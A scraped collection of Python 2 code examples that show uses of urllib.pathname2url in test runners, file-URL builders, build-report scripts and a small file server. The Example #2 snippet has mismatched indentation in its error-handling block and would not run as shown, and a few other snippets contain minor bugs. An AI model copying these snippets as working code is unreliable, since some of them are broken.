def smokeTest(self):
     falseNegatives = 0.
     falsePositives = 0.
     pCount = 0.
     nCount = 0.
     for article in os.listdir(self.parentURL + "positive"):
         pCount += 1
         s = join(self.parentURL+"positive",article)
         result, resultString = self.evaluate(urllib.pathname2url(s))
         if result:
             continue
         else:
             falseNegatives += 1
     pError = falseNegatives / pCount
     print "Rate of False Negatives = ", pError*100.0
     for article in os.listdir(self.parentURL + "negative"):
         nCount += 1
         s = join(self.parentURL+"negative",article)
         result, resultString = self.evaluate(urllib.pathname2url(s))
         if not result:
             continue
         else:
             falsePositives += 1
     nError = falsePositives / nCount
     print "Rate of False Positives = ", nError*100.0
     accuracy = (((nCount - falsePositives) + (pCount - falseNegatives)) / (nCount + pCount))*100.0
     print "Total Accuracy = ", accuracy
     print falseNegatives
     print pCount
     print falsePositives
     print nCount
Example #2
 def get_resource(self, url, hint=None):
   # Try to open as a local path
   try:
     handle = urllib.urlopen(urllib.pathname2url(url))
     return handle
   except IOError as e:
     pass
   # Try to open as an absolute path by combining 'hint' and 'url'
   if hint is not None:
     try:
       path = os.path.join(hint, url)
       handle = urllib.urlopen(urllib.pathname2url(path))
       return handle
     except IOError as e:
       pass
   # Case where input URL is not a local path
   try:
     handle = self.opener.open(url)
     return handle
   except IOError as e:
     pass
    # 'e' stays bound from the except block above (Python 2 keeps it); anything
    # other than an HTTP 401 at this point is a fatal error.
    if not hasattr(e, 'code') or e.code != 401:
      raise EnvironmentError(str(e.errno) + ": " + str(e.strerror))
   # Case where login / password are unknown
   else:
     username = str(raw_input("Username for " + url + ": "))
     password = getpass.getpass()
     self.manager.add_password(None, url, username, password)
     try:
       handle = self.opener.open(url)
       return handle
     except IOError as e:
       print(str(e.errno) + ": " + str(e.strerror))
Example #3
    def buildUri(self):

        # Assign class variables from FitNesse arguments if they 
        # are not passed in from the row.
        if (not self.host): self.host = self.args[0]
        if (not self.updateVersion): self.updateVersion = self.args[1]
        if (not self.product): self.product = self.args[2]
        if (not self.version): self.version = self.args[3]
        if (not self.platform): self.platform = self.args[4]
        if (not self.locale): self.locale = self.args[5]
        if (not self.osVersion): self.osVersion = self.args[6]

        if (self.osVersion != "NULL"):
            url = '/'.join((self.host, 
                pathname2url('/'.join((self.updateVersion, self.product, self.version,
                            self.build, self.platform, self.locale,
                            self.channel, self.osVersion, self.dist, 
                            self.distVersion, "update.xml")))
                ))
        else:
            url = '/'.join((self.host, 
                pathname2url('/'.join((self.updateVersion, self.product, self.version,
                            self.build, self.platform, self.locale,
                            self.channel, "update.xml")))
                ))
        if (self.force == 'true'):
            url += '?force=1'

        if (self.newchannel != "NULL"):
            # use '&' if a query string was already started by force=1
            url += ('&' if '?' in url else '?') + 'newchannel=' + self.newchannel

        return url
Example #4
def dirlist(dir_path,url):
    import os
    import urlparse
    from urllib import pathname2url,url2pathname
             
    if not url.endswith("/"):
        url += "/"
    names = os.listdir(dir_path)
    dirs = [ name for name in names
        if os.path.isdir(os.path.join(dir_path,name)) ]
    files = [ name for name in names 
        if os.path.isfile(os.path.join(dir_path,name)) ]
    
    dirs.sort(key=lambda name: name.lower())
    files.sort(key=lambda name: name.lower())
    
    head = """<head>
    <title>Directory listing</title>
    <link rel="stylesheet" href="/karrigell.css">
    </head>"""
    body = "<H1>Contents of %s</H1>" %url    
    body += '<span class="cadre">-</span>'
    body += '<A href="../">parent directory</A>'
    for d in dirs:
        #body += '<BR>+<A href="%s">%s</A>\n' %(urlparse.urljoin(url,pathname2url(d)),d)
        body += '<BR><SPAN class="cadre">+</span>'
        body += '<A href="%s/">%s</A>\n' \
            %(urlparse.urljoin(url,pathname2url(d)),d) 

    for f in files:
        body += '<BR>&nbsp;<A href="%s">%s</A>\n' \
            %(urlparse.urljoin(url,pathname2url(f)),f)

    
    return '<html>%s <body>%s</body></html>' %(head,body)
Example #5
def convert_to_pdf(filename, pdf_filename):
    # print filename, pdf_filename
    if filename.endswith("ods"):
        filter_name = "calc_pdf_Export"
    else:
        filter_name = "writer_pdf_Export"
    if sys.platform == 'win32':
        filename = ''.join(["file:", urllib.pathname2url(unicode(os.path.abspath(filename)).encode("utf8"))])
        pdf_filename = ''.join(["file:", urllib.pathname2url(unicode(os.path.abspath(pdf_filename)).encode("utf8"))])
        StarDesktop, objServiceManager, core_reflection = getOOoContext()
        document = StarDesktop.LoadComponentFromURL(
            filename,
            "_blank",
            0,
            MakePropertyValues(
                objServiceManager,
                [["ReadOnly", True],
                 ["Hidden", True]]))
        document.storeToUrl(
            pdf_filename,
            MakePropertyValues(
                objServiceManager,
                [["CompressMode", 1],
                 ["FilterName", filter_name]]))
        document.close(False)
    else:
        shutil.copy(filename, pdf_filename)
Example #6
def check(tool, mainFD):
  checkFD=codecs.open(pj(args.reportOutDir, tool, "check.txt"), "w", encoding="utf-8")
  if not args.disableMakeCheck:
    # make check
    print("RUNNING make check\n", file=checkFD); checkFD.flush()
    if simplesandbox.call(["make", "-j", str(args.j), "check"], envvar=["PKG_CONFIG_PATH", "LD_LIBRARY_PATH"], shareddir=["."],
                          stderr=subprocess.STDOUT, stdout=checkFD)==0:
      result="done"
    else:
      result="failed"
  else:
    print("make check disabled", file=checkFD); checkFD.flush()
    result="done"

  foundTestSuiteLog=False
  testSuiteLogFD=codecs.open(pj(args.reportOutDir, tool, "test-suite.log.txt"), "w", encoding="utf-8")
  for rootDir,_,files in os.walk('.'): # append all test-suite.log files
    if "test-suite.log" in files:
      testSuiteLogFD.write('\n\n')
      testSuiteLogFD.write(open(pj(rootDir, "test-suite.log")).read())
      foundTestSuiteLog=True
  testSuiteLogFD.close()
  if not args.disableMakeCheck:
    print('<td class="%s"><span class="glyphicon glyphicon-%s"></span>&nbsp;'%("success" if result=="done" else "danger",
      "ok-sign alert-success" if result=="done" else "exclamation-sign alert-danger"), file=mainFD)
    print('  <a href="'+myurllib.pathname2url(pj(tool, "check.txt"))+'">'+result+'</a>', file=mainFD)
    if foundTestSuiteLog:
      print('  <a href="'+myurllib.pathname2url(pj(tool, "test-suite.log.txt"))+'">test-suite.log</a>', file=mainFD)
    print('</td>', file=mainFD)
  checkFD.close()
  mainFD.flush()

  if result!="done":
    return 1
  return 0
 def test_quoting(self):
     # Test that automatic quoting and unquoting work for pathname2url() and
     # url2pathname() respectively
     given = os.path.join("needs", "quot=ing", "here")
     expect = "needs/%s/here" % urllib.quote("quot=ing")
     result = urllib.pathname2url(given)
     self.assertEqual(expect, result,
                      "pathname2url() failed; %s != %s" %
                      (expect, result))
     expect = given
     result = urllib.url2pathname(result)
     self.assertEqual(expect, result,
                      "url2pathname() failed; %s != %s" %
                      (expect, result))
     given = os.path.join("make sure", "using_quote")
     expect = "%s/using_quote" % urllib.quote("make sure")
     result = urllib.pathname2url(given)
     self.assertEqual(expect, result,
                      "pathname2url() failed; %s != %s" %
                      (expect, result))
     given = "make+sure/using_unquote"
     expect = os.path.join("make+sure", "using_unquote")
     result = urllib.url2pathname(given)
     self.assertEqual(expect, result,
                      "url2pathname() failed; %s != %s" %
                      (expect, result))
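For concreteness, a minimal sketch of the round trip the test above asserts, assuming the POSIX flavour of Python 2's urllib:

import os
import urllib

path = os.path.join("needs", "quot=ing", "here")
url = urllib.pathname2url(path)          # 'needs/quot%3Ding/here'
assert urllib.url2pathname(url) == path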
def getRoUri(roref):
    uri = roref
    if urlparse.urlsplit(uri).scheme == "":
        base = "file://"+urllib.pathname2url(os.path.abspath(os.getcwd()))+"/"
        uri  = urlparse.urljoin(base, urllib.pathname2url(roref))
    if not uri.endswith("/"): uri += "/" 
    return rdflib.URIRef(uri)
Example #9
def get_user_id(username, location):
    """Gets the user id for a particular user.

    Args:
        username: URL encoded username for the summoner.
        location: Riot abbreviation for the region.
    """

    try:
        LOGGING.push(
            "*'" + username + "'* from @'" + location +
            "'@ is requesting their user ID."
        )

        # TODO(Save the ID lookup in the database.)
        session = RiotSession(API_KEY, location)

        response = session.get_ids([urllib.pathname2url(username)])
        return response[urllib.pathname2url(username)]['id']

    # TODO(Fix this to catch both 429 and 400 errors w/ Riot Exception.)
    except ValueError:
        LOGGING.push(
            "Tried to get *'" + username +
            "'* id. Response did not have user id."
        )
        abort(404, {'message': "User ID was not found."})
Example #10
 def generate_filename(self, title, content, date):
     if title:
         title = title.replace(' ', '-')
         return urllib.pathname2url(title)
     else:
         hash = hashlib.sha256(content + date).digest()
         return urllib.pathname2url(hash)
Example #11
def create_input_source(source=None, publicID=None,
                        location=None, file=None, data=None, format=None):
    """
    Return an appropriate InputSource instance for the given
    parameters.
    """

    # TODO: test that exactly one of source, location, file, and data
    # is not None.

    input_source = None

    if source is not None:
        if isinstance(source, InputSource):
            input_source = source
        else:
            if isinstance(source, basestring):
                location = source
            elif hasattr(source, "read") and not isinstance(source, Namespace):
                f = source
                input_source = InputSource()
                input_source.setByteStream(f)
                if hasattr(f, "name"):
                    input_source.setSystemId(f.name)
            else:
                raise Exception("Unexpected type '%s' for source '%s'" %
                                (type(source), source))

    absolute_location = None  # Further to fix for issue 130

    if location is not None:
        # Fix for Windows problem https://github.com/RDFLib/rdflib/issues/145
        if os.path.exists(location):
            location = pathname2url(location)
        base = urljoin("file:", "%s/" % pathname2url(os.getcwd()))
        absolute_location = URIRef(location, base=base).defrag()
        if absolute_location.startswith("file:///"):
            filename = url2pathname(absolute_location.replace("file:///", "/"))
            file = open(filename, "rb")
        else:
            input_source = URLInputSource(absolute_location, format)
        # publicID = publicID or absolute_location # More to fix for issue 130

    if file is not None:
        input_source = FileInputSource(file)

    if data is not None:
        if isinstance(data, unicode):
            data = data.encode('utf-8')
        input_source = StringInputSource(data)

    if input_source is None:
        raise Exception("could not create InputSource")
    else:
        if publicID is not None:  # Further to fix for issue 130
            input_source.setPublicId(publicID)
        # Further to fix for issue 130
        elif input_source.getPublicId() is None:
            input_source.setPublicId(absolute_location or "")
        return input_source
Example #12
                def handle_result_pixbuf(pixbuf, engine_uri, tooltip_image, tooltip_text, should_save):
                    if self.ticket.release(entry, ticket):
                        if should_save:
                            if pixbuf.get_has_alpha():
                                pixbuf.savev(
                                    art_location_png,
                                    ART_CACHE_FORMAT_PNG,
                                    ART_CACHE_SETTINGS_NAMES_PNG,
                                    ART_CACHE_SETTINGS_VALUES_PNG,
                                )
                                uri = "file://" + pathname2url(art_location_png)
                            else:
                                pixbuf.savev(
                                    art_location_jpg,
                                    ART_CACHE_FORMAT_JPG,
                                    ART_CACHE_SETTINGS_NAMES_JPG,
                                    ART_CACHE_SETTINGS_VALUES_JPG,
                                )
                                uri = "file://" + pathname2url(art_location_jpg)

                            self.write_meta_file(art_location_meta, tooltip_image, tooltip_text)
                        else:
                            uri = engine_uri

                        print "found image for %s" % (entry.get_string(RB.RhythmDBPropType.LOCATION))
                        callback(entry, pixbuf, uri, tooltip_image, tooltip_text)
                        for m in self.same_search.pop(entry, []):
                            print "and for same search %s" % (m.get_string(RB.RhythmDBPropType.LOCATION))
                            callback(m, pixbuf, uri, tooltip_image, tooltip_text)

                    self.write_blist(blist_location, blist)
                    self.same_search.pop(entry, None)
    def _set_url(self, wsdl):
        """ 
        Set the path of file-based wsdls for processing.If not file-based,
        return a fully qualified url to the WSDL
        """
        if self.fromurl == True:
            if wsdl.endswith('wsdl'):
                wsdl.replace('.wsdl','')
            qstring = '?WSDL=%s' % wsdl
            return 'https://%s:%s%s' % (self.hostname, self.port,
                                        ICONTROL_URI + qstring)

        else:

            if wsdl.endswith('wsdl'):
                pass
            else:
                wsdl = wsdl + '.wsdl'
        
            # Check for windows and use goofy paths. Otherwise assume *nix
            if platform.system().lower() == 'windows':
                url = 'file:' + pathname2url(self.directory +'\\' + wsdl)
            else:
                url = 'file:' + pathname2url(self.directory + '/' + wsdl)
        return url
Example #14
    def update_submission(submission, status, job_id):
        """
        Updates the status of a submission.

        submission: The CompetitionSubmission object to update.
        status: The new status string: 'running', 'finished' or 'failed'.
        job_id: The job ID used to track the progress of the evaluation.
        """
        if status == 'running':
            _set_submission_status(submission.id, CompetitionSubmissionStatus.RUNNING)
            return Job.RUNNING

        if status == 'finished':
            result = Job.FAILED
            state = {}
            if len(submission.execution_key) > 0:
                logger.debug("update_submission_task loading state: %s", submission.execution_key)
                state = json.loads(submission.execution_key)
            if 'score' in state:
                logger.debug("update_submission_task loading final scores (pk=%s)", submission.pk)
                submission.output_file.name = pathname2url(submission_output_filename(submission))
                submission.save()
                logger.debug("Retrieving output.zip and 'scores.txt' file (submission_id=%s)", submission.id)
                ozip = ZipFile(io.BytesIO(submission.output_file.read()))
                scores = open(ozip.extract('scores.txt'), 'r').read()
                logger.debug("Processing scores... (submission_id=%s)", submission.id)
                for line in scores.split("\n"):
                    if len(line) > 0:
                        label, value = line.split(":")
                        try:
                            scoredef = SubmissionScoreDef.objects.get(competition=submission.phase.competition,
                                                                      key=label.strip())
                            SubmissionScore.objects.create(result=submission, scoredef=scoredef, value=float(value))
                        except SubmissionScoreDef.DoesNotExist:
                            logger.warning("Score %s does not exist (submission_id=%s)", label, submission.id)
                logger.debug("Done processing scores... (submission_id=%s)", submission.id)
                _set_submission_status(submission.id, CompetitionSubmissionStatus.FINISHED)
                # Automatically submit to the leaderboard?
                if submission.phase.is_blind:
                    logger.debug("Adding to leaderboard... (submission_id=%s)", submission.id)
                    add_submission_to_leaderboard(submission)
                    logger.debug("Leaderboard updated with latest submission (submission_id=%s)", submission.id)
                result = Job.FINISHED
            else:
                logger.debug("update_submission_task entering scoring phase (pk=%s)", submission.pk)
                url_name = pathname2url(submission_prediction_output_filename(submission))
                submission.prediction_output_file.name = url_name
                submission.save()
                try:
                    score(submission, job_id)
                    result = Job.RUNNING
                    logger.debug("update_submission_task scoring phase entered (pk=%s)", submission.pk)
                except Exception:
                    logger.exception("update_submission_task failed to enter scoring phase (pk=%s)", submission.pk)
            return result

        if status != 'failed':
            logger.error("Invalid status: %s (submission_id=%s)", status, submission.id)
        _set_submission_status(submission.id, CompetitionSubmissionStatus.FAILED)
Example #15
def setup_psd_pregenerated(workflow, tags=[]):
    '''
    Setup CBC workflow to use pregenerated psd files.
    The file given in cp.get('workflow','pregenerated-psd-file-(ifo)') will 
    be used as the --psd-file argument to geom_nonspinbank, geom_aligned_bank
    and pycbc_plot_psd_file.

    Parameters
    ----------
    workflow: pycbc.workflow.core.Workflow
        An instanced class that manages the constructed workflow.
    tags : list of strings
        If given these tags are used to uniquely name and identify output files
        that would be produced in multiple calls to this function.

    Returns
    --------
    psd_files : pycbc.workflow.core.FileList
        The FileList holding the PSD files
    '''
    psd_files = FileList([])

    cp = workflow.cp
    global_seg = workflow.analysis_time
    user_tag = "PREGEN_PSD"

    # Check for one psd for all ifos
    try:
        pre_gen_file = cp.get_opt_tags('workflow-psd',
                        'psd-pregenerated-file', tags)
        pre_gen_file = resolve_url(pre_gen_file)
        file_url = urlparse.urljoin('file:',
                                     urllib.pathname2url(pre_gen_file))
        curr_file = File(workflow.ifos, user_tag, global_seg, file_url,
                                                    tags=tags)
        curr_file.PFN(file_url, site='local')
        psd_files.append(curr_file)
    except ConfigParser.Error:
        # Check for one psd per ifo
        for ifo in workflow.ifos:
            try:
                pre_gen_file = cp.get_opt_tags('workflow-psd',
                                'psd-pregenerated-file-%s' % ifo.lower(),
                                tags)
                pre_gen_file = resolve_url(pre_gen_file)
                file_url = urlparse.urljoin('file:',
                                             urllib.pathname2url(pre_gen_file))
                curr_file = File(ifo, user_tag, global_seg, file_url,
                                                            tags=tags)
                curr_file.PFN(file_url, site='local')
                psd_files.append(curr_file)

            except ConfigParser.Error:
                # It's unlikely, but not impossible, that only some ifos
                # will have pregenerated PSDs
                logging.warn("No psd file specified for IFO %s." % (ifo,))
                pass
            
    return psd_files
 def _get_base_url(self, scheme, host, port, file_path):
     if netutils.is_valid_ipv6(host):
         base_url = "%s://[%s]:%s/folder/%s" % (scheme, host, port,
                                             urllib.pathname2url(file_path))
     else:
         base_url = "%s://%s:%s/folder/%s" % (scheme, host, port,
                                           urllib.pathname2url(file_path))
     return base_url
Example #17
 def _get_base_url(self, scheme, host, port, file_path):
     if netutils.is_valid_ipv6(host):
         base_url = "{0!s}://[{1!s}]:{2!s}/folder/{3!s}".format(scheme, host, port,
                                             urllib.pathname2url(file_path))
     else:
         base_url = "{0!s}://{1!s}:{2!s}/folder/{3!s}".format(scheme, host, port,
                                           urllib.pathname2url(file_path))
     return base_url
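A standalone sketch of the pattern shared by both _get_base_url variants above; netutils.is_valid_ipv6 is replaced by an explicit flag so the example has no OpenStack dependency, and the host and path values are made up:

import urllib

def make_base_url(scheme, host, port, file_path, is_ipv6=False):
    # IPv6 literals must be bracketed in the authority part of the URL.
    host_part = "[%s]" % host if is_ipv6 else host
    return "%s://%s:%s/folder/%s" % (scheme, host_part, port,
                                     urllib.pathname2url(file_path))

# make_base_url('https', '10.0.0.5', 443, 'datastore1/disk 1.vmdk')
#   -> 'https://10.0.0.5:443/folder/datastore1/disk%201.vmdk'  (POSIX quoting)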
Example #18
def test_post_filename():

    content = 'some stuff in here'
    title = 'this is awesome'
    post = Post(content, prefix=prefix, author=author)
    expected = urllib.pathname2url(hashlib.sha256(content + post.meta['date']).digest())
    assert post.filename == expected, 'filename is %s expected %s' % (post.filename, expected)
    post = Post(content, prefix=prefix, title=title, author=author)
    assert post.filename == urllib.pathname2url(title.replace(' ', '-'))
    def parse_grabbed(self, url, item, datestr=u'2014-07-18T11:20:24+00:00'):
        """
        Parse grabbed item, extract title content, tags
        THIS IS THE METHOD YOU HAVE TO MODIFY FIRST TO GET THIS THING WORKING
        """
        raw_data = item['raw_content']
        parsd = PyQuery(raw_data)
        content_el = parsd('div.entry-content')
        if not content_el:
            content_el = parsd('.post-content')
        content = content_el.html()
        title = parsd('h1').html()
        tags = []
        for raw_tag in parsd('ul.tag-list>li>a'):
            tag = {'title':raw_tag.text,
                   'slug':urllib.pathname2url(
                       raw_tag.attrib['href'].split('/')[-1].encode('utf8')
                    )
                }
            tags.append(tag)
        raw_posted_date = parsd('header .entry-meta time.entry-date')
        if raw_posted_date:
            raw_posted_date_text = raw_posted_date[0].attrib['datetime']
        else:
            print "Failed to parse date!"
            raw_posted_date_text=datestr
        print "Setting post date: {}".format(raw_posted_date_text)
        posted_date = datetime.datetime.strptime(raw_posted_date_text[:-6],"%Y-%m-%dT%H:%M:%S")
        raw_category = None
        for potential_category in parsd('a'):
            if potential_category.attrib.get('rel'):
                if 'tag' in potential_category.attrib.get('rel'):
                    raw_category = potential_category
                    break
        if raw_category:
            category = {'title':raw_category.text,
                        'slug':urllib.pathname2url(
                            raw_category.attrib['href'].split('/')[-1].encode('utf8')
                        )}
        else:
            category = None
        author_raw = parsd('header vcard>a')
        author = author_raw[0].text if author_raw else None

        Posts.update({'url':url},{'$set':{
            'slug':url.split('/')[-1],
            'content':content,
            'title':title,
            'tags':tags,
            'posted_date':posted_date,
            'category':category,
            'author':author,
            'parsed':True
        }})
        self.parsedurls += 1
        time.sleep(1)
        return Posts.find_one({'url':url})
Example #20
def generate_capture(exepath, html_path, img_path):
    """  HTML画面キャプチャを取得し、png形式で出力。

    * exepath: コマンド
    * html_path: HTMLファイルパス
    * img_path: 結果出力パス
    """

    timeout = 10

    try:
        if IS_WINDOWS:
            page_uri = 'file:%s' % urllib.pathname2url(os.path.normpath(html_path))
            exepath += '.exe'
            cmd = [exepath, '--url=%s' % page_uri, '--out=%s' % img_path, '--max-wait=%s' % 30000]
            proc = subprocess.Popen(cmd, creationflags=CREATE_NO_WINDOW, bufsize=-1)
        else:
            page_uri = 'file://%s' % urllib.pathname2url(os.path.normpath(html_path))
            exepath += '64' if '64' in platform.machine() else ''
            #if os.getenv('DISPLAY'):
            cmd = [exepath, '--url=%s' % page_uri, '--out=%s' % img_path, '--max-wait=%s' % 30000]
            #else:
            #    cmd = ['xvfb-run', '-s', '-screen 0, 1024x768x24', exepath, '--url=%s' % page_uri, '--out=%s' % img_path]
            proc = subprocess.Popen(cmd, bufsize=-1)
        st = time.time()
        while time.time() - st <= timeout:
            if proc.poll() is not None:
                try:
                    triming(img_path)
                except:
                    raise
                finally:
                    return True
            else:
                time.sleep(0.1)

        logger.debug('dead process %s' % proc.pid)
        try:
            proc.terminate()
        except:
            logger.debug(traceback.format_exc())

        time.sleep(1)
        if proc.poll() is not None:
            try:
                proc.kill()
            except:
                logger.debug(traceback.format_exc())

        return False
    except:
        logger.debug(traceback.format_exc())
        #logger.debug('exepath = %s' % (exepath))
        #logger.debug('Error occured while tring to generate capture for %s -> %s' % (html_path, img_path))
        raise
Example #21
 def getUrlPath(self, source):
     path = self.__makepath(source)
     # logger.debug(path)
     try:
         upath = urllib.pathname2url(str(path))
     except UnicodeEncodeError:
         upath = urllib.pathname2url(path.encode('utf-8'))
     if upath[:3]=='///':
         return 'file:' + upath
     else:
         return 'file://' + upath
Example #22
 def get(self):
     path = self.request.path
     icon_pattern = re.compile("^\/%s\/([0-9]+)$" % file_list.get_icon_dir())
     file_pattern = re.compile("^\/%s\/([0-9]+)$" % file_list.get_file_dir())
     # Delivering content
     if (path == "/") or (path == "/index.html"):
         data = file_list.get_html
         self.set_header('Content-Type', 'text/html')
         self.set_header('Content-Length', '{0}'.format(len(data)))
         self.write(data)
         self.finish()
     elif icon_pattern.match(path):
         try:
             head, index_string = os.path.split(path)
             index = int(index_string)
             file_path = file_list.get_icon_path_for_index(index)
             url = urllib.pathname2url(file_path)
             mime_type, encoding = mimetypes.guess_type(url)
             if mime_type == "image/svg+xml" or mime_type == "image/svg":
                 data = svg_to_png(file_path)
                 mime_type = "image/png"
             else:
                 f = open(file_path)
                 data = f.read()
                 f.close()
             if mime_type is not None:
                 self.set_header('Content-Type', mime_type)
             self.set_header('Content-Length', '{0}'.format(len(data)))
             self.write(data)
             self.finish()
         except IOError:
             self.send_file_not_found_error()
     elif file_pattern.match(path):
         try:
             head, index_string = os.path.split(path)
             index = int(index_string)
             file_path = file_list.get_file_path_for_index(index)
             head, filename = os.path.split(file_path)
             url = urllib.pathname2url(file_path)
             mime_type, encoding = mimetypes.guess_type(url)
             if mime_type is None:
                 mime_type = "application/octet-stream"
             f = open(file_path)
             data = f.read()
             self.set_header('Content-Type', mime_type)
             self.set_header('Content-Length', '{0}'.format(len(data)))
             self.set_header('Content-Disposition', 'attachment;filename="{0}";'.format(filename))
             self.write(data)
             self.finish()
             f.close()
         except IOError:
             self.send_file_not_found_error()
     else:
         self.send_file_not_found_error()
Example #23
 def setUp(self):
     fd1, self.filename1 = mkstemp(suffix=self.serpar.EXTENSION,
                                   prefix="advene2_utest_serpar_")
     fd2, self.filename2 = mkstemp(suffix=self.serpar.EXTENSION,
                                   prefix="advene2_utest_serpar_")
     fdopen(fd1).close()
     fdopen(fd2).close()
     self.url = "file:" + pathname2url(self.filename2)
     self.p1 = self.pkgcls("file:" + pathname2url(self.filename1),
                           create=True)
     self.p2 = None
 def getSearchItemURL(self, searchItem, page):
     url = "http://www.zhaoonline.com/search/"
     url += urllib.pathname2url(searchItem.name)
     url += "-8-3-trade-"
     url += urllib.pathname2url(str(categoryDic[searchItem.category]))
     url += "-"
     url += urllib.pathname2url(str(qualityDic[searchItem.quality]))
     url += "-00-N-0-N-1-"
     url += str(page)
     url += ".htm"
     return  url
Example #25
def configure(tool, mainFD):
  if not os.path.isdir(pj(args.reportOutDir, tool)): os.makedirs(pj(args.reportOutDir, tool))
  configureFD=codecs.open(pj(args.reportOutDir, tool, "configure.txt"), "w", encoding="utf-8")
  copyConfigLog=False
  savedDir=os.getcwd()
  try:
    if not args.disableConfigure:
      # pre configure
      os.chdir(pj(args.sourceDir, srcTool(tool)))
      print("\n\nRUNNING aclocal\n", file=configureFD); configureFD.flush()
      if subprocess.call(["aclocal"], stderr=subprocess.STDOUT, stdout=configureFD)!=0: raise RuntimeError("aclocal failed")
      print("\n\nRUNNING autoheader\n", file=configureFD); configureFD.flush()
      if subprocess.call(["autoheader"], stderr=subprocess.STDOUT, stdout=configureFD)!=0: raise RuntimeError("autoheader failed")
      print("\n\nRUNNING libtoolize\n", file=configureFD); configureFD.flush()
      if subprocess.call(["libtoolize", "-c"], stderr=subprocess.STDOUT, stdout=configureFD)!=0: raise RuntimeError("libtoolize failed")
      print("\n\nRUNNING automake\n", file=configureFD); configureFD.flush()
      if subprocess.call(["automake", "-a", "-c"], stderr=subprocess.STDOUT, stdout=configureFD)!=0: raise RuntimeError("automake failed")
      print("\n\nRUNNING autoconf\n", file=configureFD); configureFD.flush()
      if subprocess.call(["autoconf"], stderr=subprocess.STDOUT, stdout=configureFD)!=0: raise RuntimeError("autoconf failed")
      print("\n\nRUNNING autoreconf\n", file=configureFD); configureFD.flush()
      if subprocess.call(["autoreconf"], stderr=subprocess.STDOUT, stdout=configureFD)!=0: raise RuntimeError("autoreconf failed")
      # configure
      os.chdir(savedDir)
      os.chdir(pj(args.sourceDir, buildTool(tool)))
      copyConfigLog=True
      print("\n\nRUNNING configure\n", file=configureFD); configureFD.flush()
      if args.prefix==None:
        if subprocess.call(["./config.status", "--recheck"], stderr=subprocess.STDOUT, stdout=configureFD)!=0: raise RuntimeError("configure failed")
      else:
        command=[pj(args.sourceDir, srcTool(tool), "configure"), "--prefix", args.prefix]
        command.extend(args.passToConfigure)
        if subprocess.call(command, stderr=subprocess.STDOUT, stdout=configureFD)!=0: raise RuntimeError("configure failed")
    else:
      print("configure disabled", file=configureFD); configureFD.flush()

    result="done"
  except RuntimeError as ex:
    result=str(ex)
  if not args.disableConfigure:
    print('<td class="%s"><span class="glyphicon glyphicon-%s"></span>&nbsp;'%("success" if result=="done" else "danger",
      "ok-sign alert-success" if result=="done" else "exclamation-sign alert-danger"), file=mainFD)
    print('  <a href="'+myurllib.pathname2url(pj(tool, "configure.txt"))+'">'+result+'</a>', file=mainFD)
    if copyConfigLog:
      shutil.copyfile("config.log", pj(args.reportOutDir, tool, "config.log.txt"))
      print('  <a href="'+myurllib.pathname2url(pj(tool, "config.log.txt"))+'">config.log</a>', file=mainFD)
    print('</td>', file=mainFD)
  configureFD.close()
  mainFD.flush()
  os.chdir(savedDir)

  if result!="done":
    return 1
  return 0
Example #26
  def zoomify_add_image(self, filename, width, height, bands, pixel_format):
    from hashlib import sha256
    import urllib

    import voxel_globe.meta.models

    hasher = sha256()
    chunk = 1024*1024*16

    with open(filename, 'rb') as fid:
      data = fid.read(chunk)
      while data:
        hasher.update(data)
        data = fid.read(chunk)
    zoomify_name = os.path.join(os.path.split(filename)[0], hasher.hexdigest()+'_zoomify')
    #zoomify_name = os.path.splitext(filename)[0] + '_zoomify'
    pid = Popen(['vips', 'dzsave', filename, zoomify_name, '--layout', 
                 'zoomify'])
    pid.wait()

    #convert the slashes to URL slashes 
    relative_file_path = urllib.pathname2url(os.path.relpath(filename, 
        env['VIP_IMAGE_SERVER_ROOT']))
    basename = os.path.split(filename)[-1]
    relative_zoom_path = urllib.pathname2url(os.path.relpath(zoomify_name, 
        env['VIP_IMAGE_SERVER_ROOT']))

    img = voxel_globe.meta.models.Image.create(
          name="%s Upload %s (%s) Frame %s" % (self.meta_name,
                                               self.upload_session.name, 
                                               self.upload_session.id, 
                                               basename), 
          imageWidth=width, imageHeight=height, 
          numberColorBands=bands, pixelFormat=pixel_format, fileFormat='zoom', 
          imageUrl='%s://%s:%s/%s/%s/' % (env['VIP_IMAGE_SERVER_PROTOCOL'], 
                                         env['VIP_IMAGE_SERVER_HOST'], 
                                         env['VIP_IMAGE_SERVER_PORT'], 
                                         env['VIP_IMAGE_SERVER_URL_PATH'], 
                                         relative_zoom_path),
          originalImageUrl='%s://%s:%s/%s/%s' % (
              env['VIP_IMAGE_SERVER_PROTOCOL'], 
              env['VIP_IMAGE_SERVER_HOST'], 
              env['VIP_IMAGE_SERVER_PORT'], 
              env['VIP_IMAGE_SERVER_URL_PATH'], 
              relative_file_path),
          service_id=self.task.request.id,
          original_filename=basename)
    img.save()
     
    self.image_collection.images.add(img)
    def get_cloud_folder(self):
        try:
            val = self.config.get("Advanced", "Folder")

            if val is None:
                return urlparse.urljoin(
                    'file:', urllib.pathname2url(
                        os.path.expanduser("~/MEOCloud")))
            else:
                return 'file://' + val.replace('file://', '')
        except (ConfigParser.NoSectionError, ConfigParser.NoOptionError):
            return urlparse.urljoin(
                'file:', urllib.pathname2url(
                    os.path.expanduser("~/MEOCloud")))
Example #28
def load_file(spec_file, http_client=None):
    """Loads a spec file

    :param spec_file: Path to swagger.json.
    :param http_client: HTTP client interface.
    :return: validated json spec in dict form
    :raise: IOError: On error reading swagger.json.
    """
    file_path = os.path.abspath(spec_file)
    url = urlparse.urljoin(u'file:', urllib.pathname2url(file_path))
    # When loading from files, everything is relative to the spec file
    dir_path = os.path.dirname(file_path)
    base_url = urlparse.urljoin(u'file:', urllib.pathname2url(dir_path))
    return load_url(url, http_client=http_client, base_url=base_url)
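As a rough illustration of the two URLs load_file builds before delegating to load_url (the spec path below is made up; output assumes a POSIX system):

import os
import urllib
import urlparse

spec_file = '/srv/specs/swagger.json'            # hypothetical path
file_path = os.path.abspath(spec_file)
url = urlparse.urljoin(u'file:', urllib.pathname2url(file_path))
base_url = urlparse.urljoin(u'file:', urllib.pathname2url(os.path.dirname(file_path)))
# url      -> u'file:///srv/specs/swagger.json'  (passed to load_url)
# base_url -> u'file:///srv/specs'               (relative refs resolve against this)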
    def send_move(self, old_file_path, new_file_path):
        try:
            self.log.debug('Sending MOVE to client' + self.computer_name)
            mess = "MOVE" + ' ' + pathname2url(old_file_path) + ' ' + pathname2url(new_file_path)

            self.connection.send(mess)

            # Wait for the recieve thread to send us a ok Event
            status = self.ok.wait(8.0)
            self.ok.clear()
            if not status:
                raise IOError(
                    'Did not recieve a response from the client.' + self.computer_name)
        except IOError as err:
            self.log.error(str(err))
Example #30
